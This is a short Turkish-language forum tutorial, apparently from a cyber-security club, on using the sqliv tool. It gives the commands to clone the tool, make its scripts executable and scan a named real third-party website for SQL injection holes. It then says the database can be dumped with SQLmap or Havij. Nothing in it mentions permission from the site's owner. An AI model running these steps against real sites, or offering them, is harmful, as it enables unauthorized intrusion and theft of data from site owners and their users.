[ame]https://www.youtube.com/watch?v=LNRbTf1D32s[/ame]
Kod:
[COLOR="Lime"][B][CENTER]git clone https://github.com/BerkeUnal/sqliv.git[/CENTER][/B][/COLOR]
Terminale geçiş yaptıktan sonra yukarıdaki komut ile sqliv aracını indiriyoruz.
(Araç farklı işlemler içinde kullanılmaktadır bu konuda sadece hedef sitede sql açığı bulma gösterilecektir detaylı bilgi için yukarıdaki github bağlantısını kullanabilirsiniz.)
cd komutu ile indirdiğimiz sqliv klasörünün içine geçiş yapıyoruz.
ls ile içindekileri kontrol ediyoruz.
Kod:
[COLOR="Lime"][B][CENTER]chmod +x sqliv.py
chmod +x setup.py[/CENTER][/B][/COLOR]
Kod:
[CENTER][B][COLOR="Lime"]python sqliv.py -t [COLOR="Red"]http://berkeleyrecycling.org/[/COLOR][/COLOR][/B][/CENTER]
Yukarıdaki komutu çalıştırarak sql açık tarama işlemini başlatıyoruz. Kırmızı ile belirtilen yere hedef siteyi yazıyoruz. (yukarıdaki formata uygun şekilde)
Tarama bitince karşımıza açıklı URLler çıkıyor.
SQLmap,havij gibi programlar ile SQL açığından faydalanarak DataBase çekebilirsiniz.
Siber Güvenlik Kulübü